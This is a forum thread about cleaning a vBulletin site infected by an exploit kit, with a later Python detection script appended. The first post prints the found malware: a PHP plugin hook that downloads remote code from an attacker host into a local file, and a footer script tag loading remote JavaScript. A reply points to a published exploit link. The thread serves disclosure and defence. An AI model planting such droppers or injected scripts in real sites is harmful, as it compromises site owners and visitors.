Exploit Kit Variant 11 - How to remove

  • TheWindows7Site
    Member
    • Jul 2009
    • 44

    [Forum] Exploit Kit Variant 11 - How to remove

    THIS POST IS TO SHOW WHERE I FOUND THE SCRIPT HIDING AND HOW I REMOVED IT
    THIS IS NOT TO BE USED/ABUSED


    Found this in the plugins
    Product: vBulletin
    Hook Location: ajax_complete
    Title: !
    Code:
    Code:
    $linky="http://kokosina.in/sh.txt";$saved="./jquery.php";
    $from=fopen("$linky","r");
    $to=fopen("$saved","w");
    while(!feof($from)){
    $string=fgets($from,4096);
    fputs($to,$string);
    }
    fclose($to);
    echo 'done';
    fclose($from);
    Found this in the footer template
    Code:
    <script type="text/javascript" src="http://kokosina.in/1"></script>
    So delete that plugin (if you see it in the plugin manager)
    and remove that line from the footer template (was at the top for me)

    and make sure to update your vBulletin.

    I then ran the site through http://sitecheck.sucuri.net/scanner/ to verify I removed it all.
    Last edited by TheWindows7Site; Tue 10 Jan '12, 8:09am.
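
A triage sketch for the two artifacts described in the post above, added here as an example (it is not part of the original thread or of vBulletin's code). It assumes the plugin PHP and template text have already been exported to strings; the function names and the hosts `dropper.example` and `forum.example` are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Heuristics for the two artifacts in the post (assumed patterns, not a vendor signature set).
REMOTE_URL = re.compile(r"""["']((?:https?|ftp)://[^"']+)["']""", re.I)
FILE_WRITE = re.compile(
    r"""fopen\s*\([^)]*,\s*["'][wax]b?\+?["']\s*\)|\b(?:fwrite|fputs|file_put_contents)\s*\(""",
    re.I)
SCRIPT_SRC = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def scan_plugin_php(code):
    """Flag plugin PHP that names a remote URL and also writes a local file."""
    urls = REMOTE_URL.findall(code)
    if urls and FILE_WRITE.search(code):
        return [("remote-fetch-and-write", urls)]
    return []


def scan_template(html, allowed_hosts):
    """Return hosts of <script src> tags that are not on the forum's allow-list."""
    flagged = []
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname  # None for relative paths, which stay local
        if host and host not in allowed_hosts:
            flagged.append(host)
    return flagged


# Constructed samples modelled on the post; dropper.example and forum.example are placeholders.
SAMPLE_PLUGIN = '''$u="http://dropper.example/sh.txt";$out="./jquery.php";
$from=fopen("$u","r");$to=fopen("$out","w");
while(!feof($from)){fputs($to,fgets($from,4096));}
fclose($to);fclose($from);'''
BENIGN_PLUGIN = '$faq = "http://forum.example/faq.php"; echo $faq;'
SAMPLE_FOOTER = '''<script type="text/javascript" src="http://dropper.example/1"></script>
<script src="clientscript/site.js"></script>
<script src="//forum.example/js/site.js"></script>'''

if __name__ == "__main__":
    print(scan_plugin_php(SAMPLE_PLUGIN))
    print(scan_plugin_php(BENIGN_PLUGIN))
    print(scan_template(SAMPLE_FOOTER, {"forum.example"}))
```

A hit is a prompt to open that plugin or template and inspect it by hand; obfuscated code will not match these patterns.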
  • Simtech
    Member
    • Jan 2005
    • 65
    • 5.5.x

    #2
    I also had the trojan in my footer but no ajax hooks as described. This appeared to have been hacked during the 4.09 version. I have no 3rd party add-ons and was running a clean, unmodded forum.

    I've deleted the footer and deleted any reference to the kokosina.in script but I'm worried that there is an exploit in vBulletin... at least in earlier versions. I am up to date and currently running the 4.1.11 version with the patch.

    But I wanted to point out that exploits are being published at http://pastebin.com/V5b4XDSA on how to get into the admin sections of vBulletin. There's a ton of users that are having this problem with their forums being hacked.
